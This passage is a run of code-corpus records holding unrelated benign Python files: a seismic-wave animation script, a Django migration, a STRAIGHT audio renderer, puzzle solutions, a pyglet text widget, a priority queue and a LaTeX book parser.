the core-mantle boundary,\\n and are sensitive to the structure\\n in the deep mantle'\n# LR_L1_text='\\\"I look for these core-bouncing waves\\n in the seismogram\\\"'\n# LR_L2_text='\\\"I use the shape of the waves to investigate\\n deep mysterious structures\\n like mantle plume anchors\\\"'\n# load_image='Cartoons/Jenny_from_group_name.png'\n\n# epi_dist=145\n# theta_earthquake=-18\n# LL_L1_text='Some energy leaves the earthquake\\n and arrives at the core at a special angle'\n# LL_L2_text='At this specific angle the wave \\'hugs\\' the\\n edge of the core - this is called wave diffraction'\n# LR_L1_text='\\\"I search for core \\'hugging\\' waves\\n in the seismogram\\\"'\n# LR_L2_text='\\\"I locate the mantle plume anchors that cause\\n these waves to arrive from unexpected directions\\\"'\n# load_image='Cartoons/Zhi_from_group_name.png'\n\n# epi_dist=100\n# theta_earthquake=0\n# LL_L1_text='S or transverse waves can only travel\\n through a solid and not a liquid'\n# LL_L2_text='In 1906, British geologist Richard Oldham\\n first noticed that there were no S waves\\n beyond a certain distance from earthquakes'\n# LR_L1_text='This is called a \\'shadow zone\\''\n# LR_L2_text='This was the first clue to the\\n existence of a liquid core!'\n# load_image='Oldham.png'\n\n# epi_dist=120\n# theta_earthquake=10\n# LL_L1_text='P waves traveling through the Earth\\n bounce off interior boundaries'\n# LL_L2_text='In the 1930s Danish scientist Inge Lehmann\\n first recorded an unexpected P-wave arrival\\n that came from the inner-core boundary'\n# LR_L1_text='She argued the core might be\\n changing from a liquid to a solid\\n close to the centre of the Earth!'\n# LR_L2_text=''\n# load_image='Lehmann.png'\n\nepi_dist=179\ntheta_earthquake=78\nLL_L1_text='P waves and S waves are caused\\n by all natural earthquakes'\nLL_L2_text='The faster traveling P waves take only 20 minutes\\n to travel to the opposite side of the Earth!'\nLR_L1_text='Sensitive instruments called seismometers\\n are used to measure the shaking of the ground\\n caused by the earthquake waves at the surface'\nLR_L2_text='Waves lose lots of energy as they travel,\\n so when they return to the surface\\n the movements they cause are less than a millimeter!'\nload_image=''\n\n\n# ##################### SET UP THE PLOTTING AREA HERE #######################\n\n# Use this function to setup the intial plto area!\nfig,ax0,axgl,axgm,axgr,axll,axlr,axdi,di_figure,ax1,ax2,ax3,ax4 = spa.setup_plot(title=title,load_image=load_image,image_loc='../../wavefront_movie_images/', background_image_loc='../../wavefront_movie_home_screen/',plot_width=12.8,plot_height=7.2, epi_dist=epi_dist, depth_earthquake=depth_earthquake, polar_plot_offset=theta_earthquake, radius=radius, mirror_key_rp=False)\n\n######################## Additions to plot ax2 - wavefronts #################\n# set polar subplot as current axes\nplt.sca(ax2)\n\n# Pretty earthquake marker.\neq_symbol, = ax2.plot([0], [radius - depth_earthquake],\n marker=\"*\", color=\"#FEF215\", markersize=20, zorder=10,\n markeredgewidth=1.5, markeredgecolor=\"0.3\",\n clip_on=False)\n\n\n# Add seismometer location\nseismom_symbol, = ax2.plot([epi_dist*np.pi/180], [radius+250],\n marker=(3, 0, (60-epi_dist+theta_earthquake)), color='r', markersize=15, zorder=10,\n markeredgewidth=1.5, markeredgecolor=\"0.3\",\n clip_on=False)\n\nax2.set_rmax(radius)\nax2.set_rmin(0.0)\n\n\n###################### Additions to Cartesian plot for the seismogram #######################################\nplt.sca(ax4)\n\niter=0\ndelta=0.1\nTW_duration=300 # Sesimogram window length (s)\ntick_pointer_width=20 # drawing tick length (s)\ntime = np.arange(0, TW_duration, 1);\nt_after_eq=time[0]\namplitude = np.exp(-time/100) * np.sin(time/TW_duration/np.pi*180)\n\nax4.plot(time, amplitude,'r-', linewidth=1)\nmax_amp = np.ceil(np.max(amplitude))\nmin_amp = np.floor(np.min(amplitude))\n\nax4.set_xlim([-tick_pointer_width,TW_duration])\nax4.set_ylim([min_amp,max_amp])\n# \"Drawing tick\" goes from left side of page up until 1s before start.\ntick_x=[-tick_pointer_width, -1]\ntick_y=[amplitude[0],amplitude[0]]\nax4.set_yticks([]) # Hides y-axis labels\n# ax4.set_xticks([]) # Hides x-axis labels\n\n\nx_label_pos = time[0::60]\nx_label_val = [int(i) for i in time[0::60]/60 ]\nax4.set_xticks(x_label_pos)\nax4.set_xticklabels(x_label_val)\nax4.set_xlabel('Time after Earthquake (min)', fontsize=12)\n\nax4.plot(tick_x ,tick_y,'b-', linewidth=2)\n\n# Puts triangle at end of drawing tick\nax4.plot(-5, amplitude[0], marker=(3, 0, (-90)), color='b', markersize=10, zorder=10,\n markeredgewidth=0.5, markeredgecolor=\"0.3\", clip_on=False)\n\nax4.text(TW_duration-(TW_duration/40), max_amp-0.05, 'Time after Earthquake: '+str(t_after_eq)+'s', ha=\"right\", va=\"top\",\n fontsize=12, color='black', bbox=dict(facecolor='white', edgecolor='grey', pad=5.0))\n\nwait_rem=3\nwait_point='.'\nwaiting=wait_rem*wait_point\n\n# # Adds label for waiting arriving earthquakes waves....\nax4.text(0, min_amp+0.05, 'Earthquake waves arriving '+str(waiting), ha=\"left\", va=\"bottom\",\n fontsize=12, color='black')\n\n\n\n# Set invisible text in place for the key phase labelling.\nKey_phase_width=20\nkey_phase_seis_time_end = Key_phase_width\nkey_phase_seis_time_start = 0\nkey_phase_max_amp = 0.5 # np.max(np.abs(seis_data_new[len(time_buffer)+int(np.floor((key_phase_A_time/delta))):len(time_buffer)+int(np.floor((key_phase_A_time + Key_phase_width)/delta)):1]))\n\nrect = patches.Rectangle((key_phase_seis_time_start , -key_phase_max_amp-0.05), Key_phase_width, 2*(key_phase_max_amp+0.05), fill=False,edgecolor='b', alpha=1, visible=False)\n# Add collection to axes\nphase_box = ax4.add_patch(rect)\n\nphase_label = ax4.text(key_phase_seis_time_end+1, key_phase_max_amp+0.08, 'Wave of interest!', ha=\"left\",va=\"top\",fontsize=12, color='black', visible=False, clip_on=True, bbox=dict(facecolor='white',alpha=0.5,edgecolor='white', pad=0.0)) \n\nphase_label.set_visible(True)\n\nphase_box.set_visible(True)\n\n\n\n\n\n\n\n\n\n\n\nif len(LL_L1_text) > 0:\n # Layer 1 text - left label\n axll.text(0.5, 0.7, LL_L1_text, ha=\"center\", va=\"center\",fontsize=14, color='black', bbox=dict(facecolor='white', edgecolor='white', pad=1.0))\nif len(LL_L2_text) > 0:\n # Layer 2 text - left label\n axll.text(0.5, 0.1, LL_L2_text, ha=\"center\", va=\"center\",fontsize=12, color='black', bbox=dict(facecolor='white', edgecolor='white', pad=1.0))\nif len(LR_L1_text) > 0:\n # Layer 1 text - right label\n axlr.text(0.5, 0.7, LR_L1_text, ha=\"center\", va=\"center\",fontsize=14, color='black',bbox=dict(facecolor='white',edgecolor='white', pad=1.0)) # Add some labels if you wish\nif len(LR_L2_text) > 0:\n # Layer 2 text - right label\n axlr.text(0.5, 0.1, LR_L2_text, ha=\"center\", va=\"center\",fontsize=12, color='black',bbox=dict(facecolor='white',edgecolor='white', pad=1.0)) # Add some labels if you wish\n\n# Plot descriptive image (di) between the labels.\nif len(di_figure) > 0:\n axdi.imshow(di_figure, alpha=1)\n\nplt.show()\n","sub_path":"wavefront_movie/Testing_Scripts/test_fig_layout.py","file_name":"test_fig_layout.py","file_ext":"py","file_size_in_byte":8807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"438736535","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('clients', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Issue',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),\n ('date_opened', models.DateField()),\n ('date_closed', models.DateField(null=True)),\n ('reason', models.TextField()),\n ('diagnosis', models.TextField()),\n ('work_cost', models.DecimalField(max_digits=8, decimal_places=2)),\n ('comment', models.TextField()),\n ('car', models.ForeignKey(to='clients.Car')),\n ('client', models.ForeignKey(to='clients.Client')),\n ],\n ),\n migrations.CreateModel(\n name='Part',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),\n ('name', models.CharField(max_length=64)),\n ('description', models.TextField()),\n ('cost', models.DecimalField(max_digits=8, decimal_places=2)),\n ],\n ),\n migrations.CreateModel(\n name='Service',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),\n ('name', models.CharField(max_length=64)),\n ('description', models.TextField()),\n ('cost', models.DecimalField(max_digits=8, decimal_places=2)),\n ],\n ),\n migrations.AddField(\n model_name='issue',\n name='parts',\n field=models.ForeignKey(to='issues.Part'),\n ),\n migrations.AddField(\n model_name='issue',\n name='services',\n field=models.ForeignKey(to='issues.Service'),\n ),\n ]\n","sub_path":"source/issues/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"564252812","text":"#!/usr/bin/env python3\nimport json\nfrom collections import namedtuple\n\nROOT = \"../..\"\nWWW = \"/www\" # do not change, used by cordova (?)\nLANG = \"/lang\" # do not change, used by gettext (?)\nAPI = \"/api\"\nSRC = \"/src\"\nENGLISH_TEMPLATE = \"/english_template\"\nSTUDIES = \"/studies\"\nFP_DOMAIN = \"first_principles\"\nENCODING = \"UTF-8\"\nLANGUAGES_FILE = \"/languages.cfg\"\nLANGUAGES_JS = \"/languages.js\"\nJS = \"/js\"\nEN = \"/en\"\nSTUDIES_FILE = \"/studies_list.json\"\nPOEDITOR_IMPROVE_TRANSLATION_ID = \"improve_translation_url\"\nPOEDITOR_PROJECT_URL = \"https://poeditor.com/projects/po_edit?id=106095\"\nPOEDITOR_LANGUAGE_ID_FILE = \"poeditor_id.json\"\nLC_MESSAGES = \"/LC_MESSAGES\"\nFLAG_FILE_NAME = \"flag.png\"\n\n\n\nSTUDY_LIST = []\nSTUDY_TAGS = {}\nStudy = namedtuple(\"Study\", \"name title\")\n\nwith open(ROOT + SRC + WWW + STUDIES_FILE) as data:\n studies = json.load(data)\nfor name in studies:\n STUDY_LIST.append(Study(name, studies[name][\"title\"]))\n STUDY_TAGS[name] = studies[name][\"poeditor_tag\"]\n STUDY_LIST.sort()\n \nLANGUAGES_LIST = []\nwith open(ROOT + LANGUAGES_FILE) as data:\n LANGUAGES_LIST = json.load(data)\n\n\n \n\n","sub_path":"script/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"77649767","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nAUTHOR\n\n Sébastien Le Maguer <slemaguer@coli.uni-saarland.de>\n\nDESCRIPTION\n\n Package which contains the STRAIGHT audio rendering\n\nLICENSE\n This script is in the public domain, free from copyrights or restrictions.\n Created: 10 October 2016\n\"\"\"\n\nimport os\nimport logging\n\nfrom multiprocessing import JoinableQueue\n\nfrom rendering.utils.parameterconversion import ParameterConversion\n\nfrom utils import run_shell_command\n\n###############################################################################\n# Functions\n###############################################################################\nclass STRAIGHTRenderer:\n \"\"\"Renderer based on STRAIGHT to generate audio signal\n \"\"\"\n def __init__(self, conf, nb_proc, preserve):\n \"\"\"Constructor\n\n :param conf: the configuration object\n :param out_handle: the handle where the standard output of subcommands is dumped\n :param logger: the logger\n :param nb_proc: the number of process to run\n :param preserve: switch to preserve intermediate files or not\n :returns: None\n :rtype:\n\n \"\"\"\n self.conf = conf\n self.logger = logging.getLogger(\"STRAIGHTRenderer\")\n self.nb_proc = nb_proc\n self.preserve = preserve\n self.MATLAB=\"matlab\"\n\n def straight_part(self, in_path, out_path, gen_labfile_base_lst):\n \"\"\"Achieving the straight generation\n\n :param out_path: the output directory path\n :param gen_labfile_base_lst: the file containing the list of utterances\n :returns: None\n :rtype:\n\n \"\"\"\n\n # Generate STRAIGHT script\n with open(self.conf.STRAIGHT_SCRIPT, 'w') as f:\n # Header\n f.write(\"path(path, '%s');\\n\" % self.conf.STRAIGHT_PATH)\n f.write(\"prm.spectralUpdateInterval = %f;\\n\" % self.conf.SIGNAL['frameshift'])\n f.write(\"prm.levelNormalizationIndicator = 0;\\n\\n\")\n\n # Now some parameters\n f.write(\"out_path = '%s';\\n\" % out_path)\n f.write(\"fft_len = %d;\\n\" % 1025) # FIXME: hardcoded\n f.write(\"samplerate = %d;\\n\" % self.conf.SIGNAL[\"samplerate\"])\n f.write(\"basenames = {};\\n\")\n for i in range(1, len(gen_labfile_base_lst)+1):\n base = gen_labfile_base_lst[i-1]\n f.write(\"basenames{%d} = '%s';\\n\" % (i, base))\n f.write(\"\\n\")\n\n f.write(\"nb_frames = [];\\n\")\n for i in range(1, len(gen_labfile_base_lst)+1):\n base = gen_labfile_base_lst[i-1]\n nb_frames = os.path.getsize('%s/%s.f0' % (out_path, base)) / 4\n f.write(\"nb_frames(%d) = %d;\\n\" % (i, nb_frames))\n f.write(\"\\n\")\n\n # Read STRAIGHT params\n nb_elts = len(gen_labfile_base_lst)\n if self.nb_proc != 1:\n f.write(\"parfor i=1:%d\\n\" % nb_elts)\n else:\n f.write(\"for i=1:%d\\n\" % nb_elts)\n\n\n f.write(\"\\ttry\\n\")\n f.write(\"\\t\\tfid_sp = fopen(sprintf('%s/%s.sp', out_path, basenames{i}), 'r', 'ieee-le');\\n\")\n f.write(\"\\t\\tfid_ap = fopen(sprintf('%s/%s.ap', out_path, basenames{i}), 'r', 'ieee-le');\\n\")\n f.write(\"\\t\\tfid_f0 = fopen(sprintf('%s/%s.f0', out_path, basenames{i}), 'r', 'ieee-le');\\n\")\n\n f.write(\"\\t\\tsp = fread(fid_sp, [fft_len nb_frames(i)], 'float');\\n\")\n f.write(\"\\t\\tap = fread(fid_ap, [fft_len nb_frames(i)], 'float');\\n\")\n f.write(\"\\t\\tf0 = fread(fid_f0, [1 nb_frames(i)], 'float');\\n\")\n\n f.write(\"\\t\\tfclose(fid_sp);\\n\")\n f.write(\"\\t\\tfclose(fid_ap);\\n\")\n f.write(\"\\t\\tfclose(fid_f0);\\n\")\n\n # Synthesis process part 2\n f.write(\"\\t\\t[sy] = exstraightsynth(f0, sp, ap, samplerate, prm);\\n\")\n f.write(\"\\t\\taudiowrite(sprintf('%s/%s.wav', out_path, basenames{i}), sy, samplerate);\\n\")\n\n f.write(\"\\tcatch me\\n\")\n f.write(\"\\t\\twarning(sprintf('cannot render %s: %s', basenames{i}, me.message));\\n\")\n f.write(\"\\tend;\\n\")\n f.write(\"end;\\n\")\n\n # Ending\n f.write(\"quit;\\n\")\n\n # Synthesis!\n cmd = '%s -nojvm -nosplash -nodisplay < %s' % (self.MATLAB, self.conf.STRAIGHT_SCRIPT)\n run_shell_command(cmd, self.logger)\n\n if not self.preserve:\n os.remove(self.conf.STRAIGHT_SCRIPT)\n # for base in gen_labfile_base_lst:\n # os.remove('%s/%s.sp' % (out_path, base))\n # os.remove('%s/%s.ap' % (out_path, base))\n # os.remove('%s/%s.f0' % (out_path, base))\n\n\n\n def parameter_conversion(self, in_path, out_path, gen_labfile_base_lst):\n \"\"\"Convert acoustic parameters to STRAIGHT compatible parameters\n\n :param out_path: the output directory path\n :param gen_labfile_base_lst: the file containing the list of utterances\n :returns: None\n :rtype:\n\n \"\"\"\n\n # Convert duration to labels\n q = JoinableQueue()\n processs = []\n for base in range(self.nb_proc):\n t = ParameterConversion(self.conf, out_path, self.preserve, q)\n t.start()\n processs.append(t)\n\n for base in gen_labfile_base_lst:\n q.put(base)\n\n\n # block until all tasks are done\n q.join()\n\n # stop workers\n for i in range(len(processs)):\n q.put(None)\n\n for t in processs:\n t.join()\n\n def render(self, in_path, out_path, gen_labfile_base_lst):\n \"\"\"Rendering\n\n :param out_path: the output directory path\n :param gen_labfile_base_lst: the file containing the list of utterances\n :returns: None\n :rtype:\n\n \"\"\"\n self.logger.info(\"Parameter conversion (could be quite long)\")\n self.parameter_conversion(in_path, out_path, gen_labfile_base_lst)\n\n self.logger.info(\"Audio rendering (could be quite long)\")\n self.straight_part(in_path, out_path, gen_labfile_base_lst)\n","sub_path":"rendering/straightrenderer.py","file_name":"straightrenderer.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"114841829","text":"import time\r\nstart_time = time.time()\r\ntarget_input = open(\"input.txt\" , \"r\")\r\nseats = target_input.read().split(\"\\n\")\r\ndel seats[-1]\r\n\r\ndef check_adjacents(array, x, y):\r\n adjacents = []\r\n for i in range(x - 1,x + 2):\r\n for j in range(y - 1,y + 2):\r\n if not (i == x and j == y) and ( i >= 0 and j >= 0):\r\n try:\r\n adjacents.append(array[i][j])\r\n except:\r\n pass\r\n \r\n return adjacents\r\n\r\nactual_layout = []\r\nfor seat in seats:\r\n actual_layout.append(list(seat))\r\n\r\nprevious_layout = []\r\n\r\nwhile previous_layout != actual_layout:\r\n previous_layout = []\r\n for line in actual_layout:\r\n previous_layout.append(line.copy())\r\n for i in range(0, len(actual_layout)):\r\n for j in range(0, len(actual_layout[0])):\r\n if actual_layout[i][j] == \"L\":\r\n adjacents = check_adjacents(previous_layout, i, j)\r\n if adjacents.count(\"#\") == 0:\r\n actual_layout[i][j] = \"#\"\r\n elif actual_layout[i][j] == \"#\":\r\n adjacents = check_adjacents(previous_layout, i, j)\r\n if not adjacents.count(\"#\") < 4:\r\n actual_layout[i][j] = \"L\"\r\n\r\ncount = 0\r\nfor line in actual_layout:\r\n count = count + line.count(\"#\")\r\n\r\nprint(count)\r\n\r\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\r\n\r\n\r\n","sub_path":"day11/day11.py","file_name":"day11.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"206184438","text":"import requests\r\nimport json\r\nfrom bs4 import BeautifulSoup\r\n\r\nURL = 'https://superheroapi.com/ids.html'\r\n\r\nheroes_page = requests.get(URL).text\r\nheroes_parser = BeautifulSoup(heroes_page, 'html.parser')\r\nheroes_data = {}\r\n\r\nfor row in heroes_parser.find_all('tr'):\r\n ids, name = row.find_all('td')[0].get_text(), row.find_all('td')[1].get_text()\r\n heroes_data[name] = ids\r\n\r\nwith open('heroes_data.json', 'w+') as f:\r\n json_data = json.dumps(heroes_data)\r\n f.write(json_data)","sub_path":"get_heroes_data.py","file_name":"get_heroes_data.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"302005710","text":"result_list = []\nlist1 = [1, 2]\nlist2 = [3, 4]\nlist3 = [5, 6]\nlist4 = [7, 8, 9]\ntuple1 = (11, 12)\ntuple2 = (13, 14)\ntuple3 = (15, 16)\ntuple4 = (17, 18, 19)\nlis = [list1, list2, list3, list4]\ntup = [list((tuple1)), list((tuple2)), list((tuple3)), list((tuple4))]\nopList = []\n\n\ndef otpList(lis, tup):\n usIp = int(input(\"Enter 1 for tuple and 2 for list : \"))\n if(usIp == 1):\n for i in range(8):\n if (i % 2 == 0):\n opList.append(tup[int(i / 2)])\n else:\n opList.append(lis[int(i / 2)])\n elif(usIp == 2):\n for i in range(8):\n if (i % 2 == 0):\n opList.append(lis[int(i/2)])\n else:\n opList.append(tup[int(i/2)])\n else:\n print(\"WRONG INPUT SORRY !!!\")\n exit()\n return opList\n\n\nprint(otpList(lis, tup))\n","sub_path":"Tuple Problems/misc-optimal.py","file_name":"misc-optimal.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"41313931","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport pyglet\nfrom pyglet.gl import *\nfrom .shape import Rectangle\nfrom .widget import Widget\nimport sys, traceback\n\n# ----------------------------------------------------------------------- EditBox\nclass EditBox(Widget):\n ''' EditBox widget\n \n Simple text edit field\n '''\n\n # _________________________________________________________________ __init__\n def __init__(self, window, x=0, y=0, z=0, width=0, height=0, pad=(5,3),\n font_size = 10, anchor_x='left', anchor_y='bottom',\n text=''):\n\n fg = (.4,.4,.8, 1)\n fgint = (150, 150, 200, 255)\n bg = (.1,.1,.2, 1)\n self.xpad,self.ypad = pad\n\n #\n self.document = pyglet.text.document.UnformattedDocument(text)\n self.document.set_style(0, len(self.document.text), \n dict(color=fgint, font_size=font_size)\n )\n\n font = self.document.get_font()\n fheight = font.ascent - font.descent\n\n layout = pyglet.text.layout.IncrementalTextLayout(\n self.document, width, fheight, multiline=False)\n \n self.caret = pyglet.text.caret.Caret(layout, color=(255,255,255))\n self.on_unset_focus()\n \n #\n if width == 0 and len(text) > 0:\n width = layout.content_width + 2 * self.xpad\n elif width == 0:\n width = 200\n \n if height == 0:\n height = layout.content_height + 2 * self.ypad\n\n #\n layout.x = self.xpad\n layout.y = self.ypad\n #layout.height = \n layout.width = width - 2*self.xpad\n\n frame = Rectangle( x=0, y=0, z=z,\n width=width, height=height, radius=0,\n foreground=fg, background=bg,\n anchor_x=anchor_x, anchor_y=anchor_y)\n\n self.text_cursor = window.get_system_mouse_cursor('text')\n\n #\n Widget.__init__( self, x, y, z, width, height, anchor_x, anchor_y) \n\n self._elements['frame'] = frame\n self._elements['layout'] = layout\n #\n def update_width(self):\n self._elements['frame'].width = self.width\n self._elements['layout'].width = self.width - 2*self.xpad\n \n #\n def update_height(self):\n self._elements['frame'].height = self.height\n #self._elements['layout'].height = \n\n #\n def on_mouse_press(self, x, y, button, modifiers):\n if self.hit_test(x,y):\n self.set_focus(self)\n self.caret.on_mouse_press(x-self._root_x, y-self._root_y, button, modifiers)\n return pyglet.event.EVENT_HANDLED\n \n if self.caret.visible:\n self.set_focus(None)\n \n return pyglet.event.EVENT_UNHANDLED\n\n\n #\n def on_text(self, text):\n self.caret.on_text(text)\n\n #\n def on_text_motion(self, motion):\n self.caret.on_text_motion(motion)\n \n #\n def on_text_motion_select(self, motion):\n self.caret.on_text_motion_select(motion)\n\n #\n def on_unset_focus(self):\n self.caret.visible = False\n self.caret.mark = 0\n self.caret.position = 0\n\n #\n def on_set_focus(self):\n self.caret.visible = True\n self.caret.mark = 0\n self.caret.position = len(self._elements['layout'].document.text)\n\n #\n def _get_text(self):\n return self.document.text\n\n def _set_text(self, text):\n self.document.text = text\n\n text = property(_get_text, _set_text,\n doc='''text data displayed by the widget\n\n :type: string\n ''')\n","sub_path":"PyWidget3/editbox.py","file_name":"editbox.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"142102718","text":"import heapq\n\nclass PriorityQueue:\n\n 'initialize pq with a member heap and a counter of the members it contains'\n def __init__(self):\n self.heap = []\n self.size = 0\n \n 'push an entry into pq using its priority and his id into the heap'\n def push(self,item,priority):\n entry = (priority,self.size,item)\n heapq.heappush(self.heap,entry)\n self.size+=1\n \n 'pop out the entry with the smallest priority'\n def pop(self):\n if(self.size > 0):\n priority, counter, item = heapq.heappop(self.heap)\n self.size += -1\n return item\n else:\n return \"Attention.There is no item to remove\"\n\n 'ind out wheather the heap is empty based on its size'\n def isEmpty(self):\n if(self.size == 0):\n return True\n else:\n return False\n\n 'check if an entry belongs to the pq and update it or push it if needed'\n def update(self,item,priority):\n i = 0\n flag = False\n\n if(self.size > 0):\n while(i < self.size):\n f_priority, f_counter, f_item = self.heap[i]\n\n if(f_item == item):\n flag = True\n\n if(f_priority > priority):\n del self.heap[i]\n self.push(item,priority)\n \n break\n\n i += 1\n\n if not flag:\n self.push(item,priority)\n\n\nif __name__ == \"__main__\":\n q = PriorityQueue()\n","sub_path":"project0/priorityQueue.py","file_name":"priorityQueue.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"577200607","text":"import re\nfrom collections import namedtuple\n\n\nclass TexBookParser(object):\n \"\"\"Parses components of a LaTeX book document into various objects for Python to utilise.\"\"\"\n\n PreambleCapture = namedtuple(\"PreambleCapture\", \"key pattern\")\n\n def __init__(self, nodes, preamble_captures=None):\n \"\"\"Initialise the new instance of our class.\"\"\"\n self.nodes = nodes\n\n if preamble_captures is None:\n preamble_captures = [\n # PreambleCapture(\"module_code\", r'\\\\modulecode\\{(\\w+)\\}'),\n # PreambleCapture(\"academic_year\", r'\\\\academicyear\\{(\\w+)\\}'),\n # PreamblCapture(\"module_title\", r'\\\\moduletitle\\{(\\w+)\\}'),\n self.PreambleCapture(key=\"book_number\", pattern=re.compile(r\"\\\\booknumber\\{(.*)\\}\")),\n self.PreambleCapture(key=\"book_title\", pattern=re.compile(r\"\\\\booktitle\\{(.*)\\}\")),\n self.PreambleCapture(key=\"book_author\", pattern=re.compile(r\"\\\\bookauthor\\{(.*)\\}\")),\n self.PreambleCapture(key=\"book_version\", pattern=re.compile(r\"\\\\bookversion\\{(.*)\\}\")),\n\n # If this regex can also capture '\\def\\CAPTUREME{MeToo}', that'd be cool...\n self.PreambleCapture(key=\"new_command\", pattern=re.compile(r\"\\\\newcommand\\{(.+)\\}\\{(.+)\\}\"))\n ]\n self.preamble_captures = preamble_captures\n\n def parse(self, latex_text):\n \"\"\"Convert the given LaTeX document text into a Python-friendly Book object.\"\"\"\n # Remove comments.\n latex_text = self.prepare_latex_text(latex_text)\n\n # Read and parse the LaTeX body.\n body = self.read_body(latex_text)\n\n root_node = self.nodes.get_class(self.nodes.root_node_id)\n root_node = root_node()\n root_node.add_children(self.parse_latex(body))\n\n # Read and parse the LaTeX preamble data.\n preamble = self.read_preamble(latex_text)\n preamble_data = self.parse_preamble(preamble)\n\n # Attach the preamble data onto the book.\n root_node.preamble_data = preamble_data\n\n return root_node\n\n def prepare_latex_text(self, latex_text):\n \"\"\"\n Prepare the LaTeX text so it may be parsed correctly.\n\n This includes tasks such as:\n - Removing embedded comments\n \"\"\"\n # Strip the leading and trailing whitespace characters.\n latex_text = latex_text.strip()\n\n # Go through the file, line by line, removing the comments.\n pattern = re.compile(r\"\\%.*$\")\n lines = latex_text.strip().split(\"\\n\")\n for idx in range(len(lines)):\n lines[idx] = re.sub(pattern, \"\", lines[idx])\n latex_text = \"\\n\".join(lines)\n\n # We'll implement this better later...\n # fixes = [\n # [r'\\\\bit\\s+', r'\\\\begin{itemize} '],\n # [r'\\\\eit\\s+', r'\\\\end{itemize} '],\n # [r'\\\\ben\\s+', r'\\\\begin{enumerate} '],\n # [r'\\\\een\\s+', r'\\\\end{enumerate} '],\n # [r'\\\\it\\s+', r'\\\\item '],\n # [r' ', r' ']\n # ]\n # for fix in fixes:\n # latex_text = re.sub(fix[0], fix[1], latex_text)\n\n return latex_text\n\n def read_preamble(self, latex_text):\n \"\"\"Return the preamble for the given LaTeX text.\"\"\"\n pattern = re.compile(r\"(.*)\\\\begin\\{document\\}\", re.DOTALL)\n match = re.search(pattern, latex_text)\n preamble = match.group(1) if match else \"\"\n return preamble\n\n def read_body(self, latex_text):\n \"\"\"Return the body for the given LaTeX text.\"\"\"\n pattern = re.compile(r\"\\\\begin\\{document\\}(.*)\\\\end\\{document\\}\", re.DOTALL)\n match = re.search(pattern, latex_text)\n body = match.group(1) if match else \"\"\n return body\n\n def parse_preamble(self, preamble):\n \"\"\"Parse the preamble text, collecting the defined data.\"\"\"\n # Dictionary to contain preamble properties and their declared values.\n preamble_data = {}\n\n # Capture a bunch of stuff from the preamble.\n for the_capture in self.preamble_captures:\n key = the_capture.key\n regex = the_capture.pattern\n pattern_obj = re.compile(regex)\n groups = re.findall(pattern_obj, preamble)\n for values in groups:\n if key in preamble_data:\n if not isinstance(preamble_data[key], list):\n preamble_data[key] = [preamble_data[key]]\n preamble_data[key].append(values)\n else:\n preamble_data[key] = values\n\n return preamble_data\n\n def parse_latex(self, latex):\n r\"\"\"Parse the body of a LaTeX document, returning an array of all the immediate children as Nodes.\n\n Takes the contents of '\\begin{document} ... \\end{document}' and generates an tree object representation.\n This method returns the immediate children of the document, with each node holding pointers to\n their own children.\n\n We leave all detection of the start/end of nodes to the nodes themselves, this allows us to extend\n the parser without further complicating this method. It also opens the door to being able to parse\n more complex LaTeX files as we can abandon the use of Regex, allowing us correctly detect\n commands - such as a italic plain-text within a level node's title argument.\n\n The logic for this method is fairly simple:\n We go through the inputted LaTeX, checking for matches with each node configured for use in the\n parser. These positive matches are then sorted into ascending order of appearance.\n\n Next, we begin to iterate over our captured matches. During each iteration, we work out the parent of\n the current match. This is done using a while loop and a stack. Each time we pop out a level, we create\n a new Text node and fill its content with all the plain-text between the current node and our last match.\n\n We now check that the parent is allowed children. We also then check that the current match does not\n occur prior to the start of the parent. We shall describe the reason for this later on...\n\n We now create an instance of the node for the current match and, if applicable, we iterate through the\n match's arguments, making sure that they're valid. If the current argument is valid, we make a recursive\n call and parse the current argument's content string into this method - returning a Python object\n representation. We make these objects children of a new Argument node, which itself is to be made a\n child of the current node.\n\n Similar to earlier in the stack, we create a new Text node and fill its content with everything\n since the last match, or since the end of the most recently popped stack node.\n\n We then perform a peak onto the stack. If the stack is empty, the newly created Text node is to be\n appended to the children list. Otherwise, if the stack is not empty, the newly created Text node is\n to be attached as a child to whatever node is currently at the top of the stack.\n\n We now repeat the above reasoning with the instance of the node for the current match and then push\n that node onto the stack.\n\n Once we've iterated over each match, we pop everything off the stack creating Text nodes for\n any remaining text. When the stack is empty, we create a Text node for all - if any - plain-text left\n unprocessed.\n \"\"\"\n children = []\n\n # Ignore latex if it's just whitespace\n if not latex.isspace():\n text_node_class = self.nodes.get_class(self.nodes.text_node_id)\n\n # Get every node class and the matches for it.\n NodeMatch = namedtuple(\"NodeMatch\", \"node match\")\n\n node_matches = []\n 